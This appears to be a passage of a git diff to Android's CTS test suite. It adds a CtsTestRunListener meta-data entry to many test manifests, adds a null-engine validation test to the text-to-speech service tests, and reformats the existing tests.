diff --git a/tests/tests/selinux/selinuxTargetSdk29/AndroidManifest.xml b/tests/tests/selinux/selinuxTargetSdk29/AndroidManifest.xml
index b37d05b..3e4e7c4 100644
--- a/tests/tests/selinux/selinuxTargetSdk29/AndroidManifest.xml
+++ b/tests/tests/selinux/selinuxTargetSdk29/AndroidManifest.xml
@@ -33,6 +33,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.selinuxtargetsdk29.cts"
android:label="CTS tests for permissions enforce by selinux based on targetSdkVersion">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/selinux/selinuxTargetSdk30/AndroidManifest.xml b/tests/tests/selinux/selinuxTargetSdk30/AndroidManifest.xml
index 80d5e6c..9b40d00 100644
--- a/tests/tests/selinux/selinuxTargetSdk30/AndroidManifest.xml
+++ b/tests/tests/selinux/selinuxTargetSdk30/AndroidManifest.xml
@@ -33,6 +33,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.selinuxtargetsdk30.cts"
android:label="CTS tests for permissions enforce by selinux based on targetSdkVersion">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/selinux/selinuxTargetSdkCurrent/AndroidManifest.xml b/tests/tests/selinux/selinuxTargetSdkCurrent/AndroidManifest.xml
index bce1b28..a209894 100644
--- a/tests/tests/selinux/selinuxTargetSdkCurrent/AndroidManifest.xml
+++ b/tests/tests/selinux/selinuxTargetSdkCurrent/AndroidManifest.xml
@@ -30,6 +30,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.selinuxtargetsdkcurrent.cts"
android:label="CTS tests for permissions enforce by selinux based on targetSdkVersion">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/sensorprivacy/AndroidManifest.xml b/tests/tests/sensorprivacy/AndroidManifest.xml
index 0fcfa2c..7b53910 100644
--- a/tests/tests/sensorprivacy/AndroidManifest.xml
+++ b/tests/tests/sensorprivacy/AndroidManifest.xml
@@ -27,6 +27,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.sensorprivacy.cts"
android:label="CTS tests of android.sensorprivacy">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/tests/tests/settings/AndroidManifest.xml b/tests/tests/settings/AndroidManifest.xml
index b1d3931..bc50a58 100644
--- a/tests/tests/settings/AndroidManifest.xml
+++ b/tests/tests/settings/AndroidManifest.xml
@@ -45,5 +45,7 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.settings.cts"
android:label="CTS tests of android Settings app">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/tests/tests/sharesheet/AndroidManifest.xml b/tests/tests/sharesheet/AndroidManifest.xml
index 13f0163..f313997 100644
--- a/tests/tests/sharesheet/AndroidManifest.xml
+++ b/tests/tests/sharesheet/AndroidManifest.xml
@@ -79,6 +79,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.sharesheet.cts"
android:label="CTS tests of android.sharesheet">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/tests/tests/shortcutmanager/AndroidManifest.xml b/tests/tests/shortcutmanager/AndroidManifest.xml
index 6feea73..182a1d8 100755
--- a/tests/tests/shortcutmanager/AndroidManifest.xml
+++ b/tests/tests/shortcutmanager/AndroidManifest.xml
@@ -67,6 +67,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.content.pm.cts.shortcutmanager"
android:label="CTS tests for ShortcutManager">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/tests/tests/simphonebookprovider/AndroidManifest.xml b/tests/tests/simphonebookprovider/AndroidManifest.xml
index 9dc1559..ca62323 100644
--- a/tests/tests/simphonebookprovider/AndroidManifest.xml
+++ b/tests/tests/simphonebookprovider/AndroidManifest.xml
@@ -30,6 +30,9 @@
<instrumentation
android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.provider.cts.simphonebook">
+ <meta-data
+ android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
<uses-feature android:name="android.hardware.telephony" />
diff --git a/tests/tests/slice/AndroidManifest.xml b/tests/tests/slice/AndroidManifest.xml
index 88fe774..668ae0a 100644
--- a/tests/tests/slice/AndroidManifest.xml
+++ b/tests/tests/slice/AndroidManifest.xml
@@ -52,6 +52,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.slice.cts"
android:label="CTS tests of android.slice">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/tests/tests/soundtrigger/AndroidManifest.xml b/tests/tests/soundtrigger/AndroidManifest.xml
index e9c6541..cfdc69f 100644
--- a/tests/tests/soundtrigger/AndroidManifest.xml
+++ b/tests/tests/soundtrigger/AndroidManifest.xml
@@ -25,6 +25,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.soundtrigger.cts"
android:label="CTS tests of android.soundtrigger">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/speech/AndroidManifest.xml b/tests/tests/speech/AndroidManifest.xml
index f801a2a..5043d03 100755
--- a/tests/tests/speech/AndroidManifest.xml
+++ b/tests/tests/speech/AndroidManifest.xml
@@ -46,6 +46,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.speech.tts.cts"
android:label="CTS tests of android.speech">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/tests/tests/speech/src/android/speech/tts/cts/TextToSpeechServiceTest.java b/tests/tests/speech/src/android/speech/tts/cts/TextToSpeechServiceTest.java
index 869b7e4..97c0c8a 100644
--- a/tests/tests/speech/src/android/speech/tts/cts/TextToSpeechServiceTest.java
+++ b/tests/tests/speech/src/android/speech/tts/cts/TextToSpeechServiceTest.java
@@ -15,21 +15,30 @@
*/
package android.speech.tts.cts;
+import android.content.Context;
import android.media.AudioAttributes;
import android.net.Uri;
import android.os.Bundle;
import android.os.ConditionVariable;
-import android.os.Environment;
+import android.os.IBinder;
import android.os.ParcelFileDescriptor;
+import android.os.ServiceManager;
+import android.speech.tts.ITextToSpeechManager;
+import android.speech.tts.ITextToSpeechSession;
+import android.speech.tts.ITextToSpeechSessionCallback;
import android.speech.tts.TextToSpeech;
import android.test.AndroidTestCase;
+import com.google.common.util.concurrent.SettableFuture;
+
import java.io.File;
import java.io.FileOutputStream;
import java.util.HashMap;
-import java.util.Map;
import java.util.List;
import java.util.Locale;
+import java.util.Map;
+import java.util.Objects;
+import java.util.concurrent.TimeUnit;
/**
* Tests for {@link android.speech.tts.TextToSpeechService} using StubTextToSpeechService.
@@ -60,6 +69,37 @@
return mTts.getTts();
}
+ public void testNullEngine() throws Exception {
+ IBinder binder = ServiceManager.getService(Context.TEXT_TO_SPEECH_MANAGER_SERVICE);
+ ITextToSpeechManager manager =
+ Objects.requireNonNull(ITextToSpeechManager.Stub.asInterface(binder));
+ // could use a spy instead but we run into "cannot proxy inaccessible class" issues
+ final SettableFuture<String> errorMsg = SettableFuture.create();
+ final SettableFuture<Void> connected = SettableFuture.create();
+ final SettableFuture<Void> disconnected = SettableFuture.create();
+ ITextToSpeechSessionCallback callback =
+ new ITextToSpeechSessionCallback.Stub() {
+ @Override
+ public void onConnected(ITextToSpeechSession session, IBinder serviceBinder) {
+ connected.set(null);
+ }
+
+ @Override
+ public void onDisconnected() {
+ disconnected.set(null);
+ }
+
+ @Override
+ public void onError(String errorInfo) {
+ errorMsg.set(errorInfo);
+ }
+ };
+ manager.createSession(null, callback);
+ assertFalse(connected.isDone());
+ assertFalse(disconnected.isDone());
+ assertEquals("Engine cannot be null", errorMsg.get(1, TimeUnit.SECONDS));
+ }
+
public void testSynthesizeToFile() throws Exception {
File sampleFile = new File(getContext().getExternalFilesDir(null), SAMPLE_FILE_NAME);
try {
@@ -67,7 +107,7 @@
int result =
getTts().synthesizeToFile(
- UTTERANCE, createParams("mocktofile"), sampleFile.getPath());
+ UTTERANCE, createParams("mocktofile"), sampleFile.getPath());
verifySynthesisFile(result, mTts, sampleFile);
} finally {
sampleFile.delete();
@@ -84,10 +124,10 @@
int result =
getTts().synthesizeToFile(
- UTTERANCE,
- params,
- sampleFile,
- params.getString(TextToSpeech.Engine.KEY_PARAM_UTTERANCE_ID));
+ UTTERANCE,
+ params,
+ sampleFile,
+ params.getString(TextToSpeech.Engine.KEY_PARAM_UTTERANCE_ID));
verifySynthesisFile(result, mTts, sampleFile);
} finally {
sampleFile.delete();
@@ -101,16 +141,16 @@
assertFalse(sampleFile.exists());
ParcelFileDescriptor fileDescriptor = ParcelFileDescriptor.open(sampleFile,
- ParcelFileDescriptor.MODE_WRITE_ONLY
- | ParcelFileDescriptor.MODE_CREATE
- | ParcelFileDescriptor.MODE_TRUNCATE);
+ ParcelFileDescriptor.MODE_WRITE_ONLY
+ | ParcelFileDescriptor.MODE_CREATE
+ | ParcelFileDescriptor.MODE_TRUNCATE);
Bundle params = createParamsBundle("mocktofile");
int result =
- getTts().synthesizeToFile(
- UTTERANCE, params, fileDescriptor,
- params.getString(TextToSpeech.Engine.KEY_PARAM_UTTERANCE_ID));
+ getTts().synthesizeToFile(
+ UTTERANCE, params, fileDescriptor,
+ params.getString(TextToSpeech.Engine.KEY_PARAM_UTTERANCE_ID));
verifySynthesisFile(result, mTts, sampleFile);
} finally {
sampleFile.delete();
@@ -119,29 +159,30 @@
}
public void testMaxSpeechInputLength() {
- File sampleFile = new File(getContext().getExternalFilesDir(null), SAMPLE_FILE_NAME);
- try {
- assertFalse(sampleFile.exists());
- TextToSpeech tts = getTts();
+ File sampleFile = new File(getContext().getExternalFilesDir(null), SAMPLE_FILE_NAME);
+ try {
+ assertFalse(sampleFile.exists());
+ TextToSpeech tts = getTts();
- int maxLength = tts.getMaxSpeechInputLength();
- StringBuilder sb = new StringBuilder();
- for (int i = 0; i < maxLength; i++) {
+ int maxLength = tts.getMaxSpeechInputLength();
+ StringBuilder sb = new StringBuilder();
+ for (int i = 0; i < maxLength; i++) {
+ sb.append("c");
+ }
+ String valid = sb.toString();
sb.append("c");
- }
- String valid = sb.toString();
- sb.append("c");
- String invalid = sb.toString();
+ String invalid = sb.toString();
- assertEquals(maxLength, valid.length());
- assertTrue(invalid.length() > maxLength);
- assertEquals(TextToSpeech.ERROR,
- tts.synthesizeToFile(invalid, createParams("mockToFile"), sampleFile.getPath()));
- assertEquals(TextToSpeech.SUCCESS,
- tts.synthesizeToFile(valid, createParams("mockToFile"), sampleFile.getPath()));
- } finally {
- sampleFile.delete();
- }
+ assertEquals(maxLength, valid.length());
+ assertTrue(invalid.length() > maxLength);
+ assertEquals(TextToSpeech.ERROR,
+ tts.synthesizeToFile(invalid, createParams("mockToFile"),
+ sampleFile.getPath()));
+ assertEquals(TextToSpeech.SUCCESS,
+ tts.synthesizeToFile(valid, createParams("mockToFile"), sampleFile.getPath()));
+ } finally {
+ sampleFile.delete();
+ }
}
public void testSpeak() throws Exception {
@@ -203,7 +244,7 @@
try {
assertFalse(TextToSpeechWrapper.isSoundFile(sampleFile.getPath()));
FileOutputStream out = new FileOutputStream(sampleFile);
- out.write(new byte[] { 0x01, 0x02 });
+ out.write(new byte[]{0x01, 0x02});
out.close();
assertFalse(TextToSpeechWrapper.isSoundFile(sampleFile.getPath()));
} finally {
@@ -212,79 +253,81 @@
}
public void testAddPlayEarcon() throws Exception {
- File sampleFile = new File(getContext().getExternalFilesDir(null), SAMPLE_FILE_NAME);
- try {
- generateSampleAudio(sampleFile);
+ File sampleFile = new File(getContext().getExternalFilesDir(null), SAMPLE_FILE_NAME);
+ try {
+ generateSampleAudio(sampleFile);
- Uri sampleUri = Uri.fromFile(sampleFile);
- assertEquals(getTts().addEarcon(EARCON_UTTERANCE, sampleFile), TextToSpeech.SUCCESS);
+ Uri sampleUri = Uri.fromFile(sampleFile);
+ assertEquals(getTts().addEarcon(EARCON_UTTERANCE, sampleFile), TextToSpeech.SUCCESS);
- int result = getTts().playEarcon(EARCON_UTTERANCE,
- TextToSpeech.QUEUE_FLUSH, createParamsBundle(EARCON_UTTERANCE), EARCON_UTTERANCE);
+ int result = getTts().playEarcon(EARCON_UTTERANCE,
+ TextToSpeech.QUEUE_FLUSH, createParamsBundle(EARCON_UTTERANCE),
+ EARCON_UTTERANCE);
- verifyAddPlay(result, mTts, EARCON_UTTERANCE);
- } finally {
- sampleFile.delete();
- }
+ verifyAddPlay(result, mTts, EARCON_UTTERANCE);
+ } finally {
+ sampleFile.delete();
+ }
}
public void testAddPlaySpeech() throws Exception {
- File sampleFile = new File(getContext().getExternalFilesDir(null), SAMPLE_FILE_NAME);
- try {
- generateSampleAudio(sampleFile);
+ File sampleFile = new File(getContext().getExternalFilesDir(null), SAMPLE_FILE_NAME);
+ try {
+ generateSampleAudio(sampleFile);
- Uri sampleUri = Uri.fromFile(sampleFile);
- assertEquals(getTts().addSpeech(SPEECH_UTTERANCE, sampleFile), TextToSpeech.SUCCESS);
+ Uri sampleUri = Uri.fromFile(sampleFile);
+ assertEquals(getTts().addSpeech(SPEECH_UTTERANCE, sampleFile), TextToSpeech.SUCCESS);
- int result = getTts().speak(SPEECH_UTTERANCE,
- TextToSpeech.QUEUE_FLUSH, createParamsBundle(SPEECH_UTTERANCE), SPEECH_UTTERANCE);
+ int result = getTts().speak(SPEECH_UTTERANCE,
+ TextToSpeech.QUEUE_FLUSH, createParamsBundle(SPEECH_UTTERANCE),
+ SPEECH_UTTERANCE);
- verifyAddPlay(result, mTts, SPEECH_UTTERANCE);
- } finally {
- sampleFile.delete();
- }
+ verifyAddPlay(result, mTts, SPEECH_UTTERANCE);
+ } finally {
+ sampleFile.delete();
+ }
}
public void testSetLanguage() {
- TextToSpeech tts = getTts();
+ TextToSpeech tts = getTts();
- assertEquals(tts.setLanguage(null), TextToSpeech.LANG_NOT_SUPPORTED);
- assertEquals(tts.setLanguage(new Locale("en", "US")), TextToSpeech.LANG_COUNTRY_AVAILABLE);
- assertEquals(tts.setLanguage(new Locale("en")), TextToSpeech.LANG_AVAILABLE);
- assertEquals(tts.setLanguage(new Locale("es", "US")), TextToSpeech.LANG_NOT_SUPPORTED);
+ assertEquals(tts.setLanguage(null), TextToSpeech.LANG_NOT_SUPPORTED);
+ assertEquals(tts.setLanguage(new Locale("en", "US")), TextToSpeech.LANG_COUNTRY_AVAILABLE);
+ assertEquals(tts.setLanguage(new Locale("en")), TextToSpeech.LANG_AVAILABLE);
+ assertEquals(tts.setLanguage(new Locale("es", "US")), TextToSpeech.LANG_NOT_SUPPORTED);
}
public void testAddAudioAttributes() {
- TextToSpeech tts = getTts();
- AudioAttributes attr =
- new AudioAttributes.Builder().setUsage(AudioAttributes.USAGE_MEDIA).build();
+ TextToSpeech tts = getTts();
+ AudioAttributes attr =
+ new AudioAttributes.Builder().setUsage(AudioAttributes.USAGE_MEDIA).build();
- assertEquals(tts.setAudioAttributes(null), TextToSpeech.ERROR);
- assertEquals(tts.setAudioAttributes(attr), TextToSpeech.SUCCESS);
+ assertEquals(tts.setAudioAttributes(null), TextToSpeech.ERROR);
+ assertEquals(tts.setAudioAttributes(attr), TextToSpeech.SUCCESS);
}
private void generateSampleAudio(File sampleFile) throws Exception {
- assertFalse(sampleFile.exists());
+ assertFalse(sampleFile.exists());
- ParcelFileDescriptor fileDescriptor = ParcelFileDescriptor.open(sampleFile,
- ParcelFileDescriptor.MODE_WRITE_ONLY
- | ParcelFileDescriptor.MODE_CREATE
- | ParcelFileDescriptor.MODE_TRUNCATE);
+ ParcelFileDescriptor fileDescriptor = ParcelFileDescriptor.open(sampleFile,
+ ParcelFileDescriptor.MODE_WRITE_ONLY
+ | ParcelFileDescriptor.MODE_CREATE
+ | ParcelFileDescriptor.MODE_TRUNCATE);
- Bundle params = createParamsBundle("mocktofile");
+ Bundle params = createParamsBundle("mocktofile");
- int result =
- getTts().synthesizeToFile(
- UTTERANCE, params, fileDescriptor,
- params.getString(TextToSpeech.Engine.KEY_PARAM_UTTERANCE_ID));
+ int result =
+ getTts().synthesizeToFile(
+ UTTERANCE, params, fileDescriptor,
+ params.getString(TextToSpeech.Engine.KEY_PARAM_UTTERANCE_ID));
- verifySynthesisFile(result, mTts, sampleFile);
+ verifySynthesisFile(result, mTts, sampleFile);
}
private void verifyAddPlay(int result, TextToSpeechWrapper mTts, String utterance)
- throws Exception {
- assertEquals(TextToSpeech.SUCCESS, result);
- assertTrue(mTts.waitForComplete(utterance));
+ throws Exception {
+ assertEquals(TextToSpeech.SUCCESS, result);
+ assertTrue(mTts.waitForComplete(utterance));
}
private HashMap<String, String> createParams(String utteranceId) {
@@ -300,7 +343,7 @@
}
private void verifySynthesisFile(int result, TextToSpeechWrapper mTts, File file)
- throws InterruptedException {
+ throws InterruptedException {
assertEquals("synthesizeToFile() failed", TextToSpeech.SUCCESS, result);
diff --git a/tests/tests/syncmanager/AndroidManifest.xml b/tests/tests/syncmanager/AndroidManifest.xml
index bf4eb96..f456465 100755
--- a/tests/tests/syncmanager/AndroidManifest.xml
+++ b/tests/tests/syncmanager/AndroidManifest.xml
@@ -32,6 +32,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.content.syncmanager.cts"
android:label="CTS tests for sync manager">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/taskfpscallback/AndroidManifest.xml b/tests/tests/taskfpscallback/AndroidManifest.xml
index 8a988b0..f7bd875 100644
--- a/tests/tests/taskfpscallback/AndroidManifest.xml
+++ b/tests/tests/taskfpscallback/AndroidManifest.xml
@@ -35,5 +35,7 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.taskfpscallback.cts"
android:label="CTS tests of android TaskFpsCallback service">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/tests/tests/telecom/AndroidManifest.xml b/tests/tests/telecom/AndroidManifest.xml
index 5b73466..9c2b522 100644
--- a/tests/tests/telecom/AndroidManifest.xml
+++ b/tests/tests/telecom/AndroidManifest.xml
@@ -208,5 +208,7 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.telecom.cts"
android:label="CTS tests for android.telecom package">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/tests/tests/telecom2/AndroidManifest.xml b/tests/tests/telecom2/AndroidManifest.xml
index 35543c9..9bc56a7 100644
--- a/tests/tests/telecom2/AndroidManifest.xml
+++ b/tests/tests/telecom2/AndroidManifest.xml
@@ -80,5 +80,7 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.telecom2.cts"
android:label="CTS tests for android.telecom package">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/tests/tests/telecom3/AndroidManifest.xml b/tests/tests/telecom3/AndroidManifest.xml
index a870a94..351260c 100644
--- a/tests/tests/telecom3/AndroidManifest.xml
+++ b/tests/tests/telecom3/AndroidManifest.xml
@@ -86,5 +86,7 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.telecom3.cts"
android:label="CTS tests for android.telecom package">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/tests/tests/telephony/current/AndroidManifest.xml b/tests/tests/telephony/current/AndroidManifest.xml
index 027371a..8730f5e 100644
--- a/tests/tests/telephony/current/AndroidManifest.xml
+++ b/tests/tests/telephony/current/AndroidManifest.xml
@@ -305,6 +305,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.telephony.cts"
android:label="CTS tests of android.telephony">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
<!-- Make sure the cts can connect to CarrierMessagingServices. This is needed for
diff --git a/tests/tests/telephony2/AndroidManifest.xml b/tests/tests/telephony2/AndroidManifest.xml
index 5ddbe0e..854154e 100644
--- a/tests/tests/telephony2/AndroidManifest.xml
+++ b/tests/tests/telephony2/AndroidManifest.xml
@@ -26,6 +26,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.telephony2.cts">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/telephony3/AndroidManifest.xml b/tests/tests/telephony3/AndroidManifest.xml
index 7f363c9..22372b8 100644
--- a/tests/tests/telephony3/AndroidManifest.xml
+++ b/tests/tests/telephony3/AndroidManifest.xml
@@ -26,6 +26,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.telephony3.cts">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/telephony4/AndroidManifest.xml b/tests/tests/telephony4/AndroidManifest.xml
index 861bb6e..aa4221f 100644
--- a/tests/tests/telephony4/AndroidManifest.xml
+++ b/tests/tests/telephony4/AndroidManifest.xml
@@ -24,6 +24,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.telephony4.cts"
android:label="CTS tests of android.telephony4">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/telephony5/AndroidManifest.xml b/tests/tests/telephony5/AndroidManifest.xml
index bdf4e30..22950a6 100644
--- a/tests/tests/telephony5/AndroidManifest.xml
+++ b/tests/tests/telephony5/AndroidManifest.xml
@@ -27,6 +27,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.telephony5.cts">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/text/AndroidManifest.xml b/tests/tests/text/AndroidManifest.xml
index e47e10c..33380f6 100644
--- a/tests/tests/text/AndroidManifest.xml
+++ b/tests/tests/text/AndroidManifest.xml
@@ -89,6 +89,8 @@
<instrumentation android:name="android.text.cts.runner.CtsTextRunner"
android:targetPackage="android.text.cts"
android:label="CTS tests of android.text">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/tests/tests/textclassifier/AndroidManifest.xml b/tests/tests/textclassifier/AndroidManifest.xml
index 3271b5e..12b4c8a 100644
--- a/tests/tests/textclassifier/AndroidManifest.xml
+++ b/tests/tests/textclassifier/AndroidManifest.xml
@@ -40,6 +40,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.view.textclassifier.cts"
android:label="CTS tests of android.view.textclassifier">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/tests/tests/theme/AndroidManifest.xml b/tests/tests/theme/AndroidManifest.xml
index 194354f..0264cbf 100644
--- a/tests/tests/theme/AndroidManifest.xml
+++ b/tests/tests/theme/AndroidManifest.xml
@@ -26,6 +26,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.theme.cts"
android:label="CTS tests for themes">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/time/AndroidManifest.xml b/tests/tests/time/AndroidManifest.xml
index 71b0649..71b7a53 100644
--- a/tests/tests/time/AndroidManifest.xml
+++ b/tests/tests/time/AndroidManifest.xml
@@ -36,6 +36,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.time.cts"
android:label="CTS tests for android.time">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/toast/AndroidManifest.xml b/tests/tests/toast/AndroidManifest.xml
index f32d16e..9b0804f 100644
--- a/tests/tests/toast/AndroidManifest.xml
+++ b/tests/tests/toast/AndroidManifest.xml
@@ -26,6 +26,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.widget.toast.cts"
android:label="CTS tests for toast windows">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/toastlegacy/AndroidManifest.xml b/tests/tests/toastlegacy/AndroidManifest.xml
index 65b02be..df11613 100644
--- a/tests/tests/toastlegacy/AndroidManifest.xml
+++ b/tests/tests/toastlegacy/AndroidManifest.xml
@@ -27,6 +27,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.widget.toast.legacy.cts"
android:label="CTS tests for legacy toast windows">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/tools/processors/view_inspector/AndroidManifest.xml b/tests/tests/tools/processors/view_inspector/AndroidManifest.xml
index 8b90543..a5399b1 100644
--- a/tests/tests/tools/processors/view_inspector/AndroidManifest.xml
+++ b/tests/tests/tools/processors/view_inspector/AndroidManifest.xml
@@ -27,6 +27,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.processor.view.inspector.cts"
android:label="CTS tests of android.processor.view.inspector">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/transition/AndroidManifest.xml b/tests/tests/transition/AndroidManifest.xml
index 8b3da0d..f2d7001 100644
--- a/tests/tests/transition/AndroidManifest.xml
+++ b/tests/tests/transition/AndroidManifest.xml
@@ -29,6 +29,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.transition.cts"
android:label="CTS tests for android.transition package">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/tv/AndroidManifest.xml b/tests/tests/tv/AndroidManifest.xml
index ea73dbb..15b97ac 100644
--- a/tests/tests/tv/AndroidManifest.xml
+++ b/tests/tests/tv/AndroidManifest.xml
@@ -188,5 +188,7 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.tv.cts"
android:label="Tests for the TV APIs.">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/tests/tests/uiautomation/AndroidManifest.xml b/tests/tests/uiautomation/AndroidManifest.xml
index 1ff02a5..edf730d 100644
--- a/tests/tests/uiautomation/AndroidManifest.xml
+++ b/tests/tests/uiautomation/AndroidManifest.xml
@@ -51,6 +51,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.app.uiautomation.cts">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/tests/tests/uidisolation/AndroidManifest.xml b/tests/tests/uidisolation/AndroidManifest.xml
index 3dfbf0e..0872521 100644
--- a/tests/tests/uidisolation/AndroidManifest.xml
+++ b/tests/tests/uidisolation/AndroidManifest.xml
@@ -36,6 +36,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.uidisolation.cts"
android:label="CTS tests of android.uidisolation">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/uidmigration/AndroidManifest.xml b/tests/tests/uidmigration/AndroidManifest.xml
index 5ee31b4..c3530da 100644
--- a/tests/tests/uidmigration/AndroidManifest.xml
+++ b/tests/tests/uidmigration/AndroidManifest.xml
@@ -23,6 +23,9 @@
android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.uidmigration.cts"
android:label="CTS tests of android.uidmigration" >
+ <meta-data
+ android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/usb/AndroidManifest.xml b/tests/tests/usb/AndroidManifest.xml
index 9bde1f2..30345e0 100644
--- a/tests/tests/usb/AndroidManifest.xml
+++ b/tests/tests/usb/AndroidManifest.xml
@@ -25,6 +25,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.usb.cts"
android:label="CTS tests of USB component">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/util/AndroidManifest.xml b/tests/tests/util/AndroidManifest.xml
index e017789..bcb9bb8 100644
--- a/tests/tests/util/AndroidManifest.xml
+++ b/tests/tests/util/AndroidManifest.xml
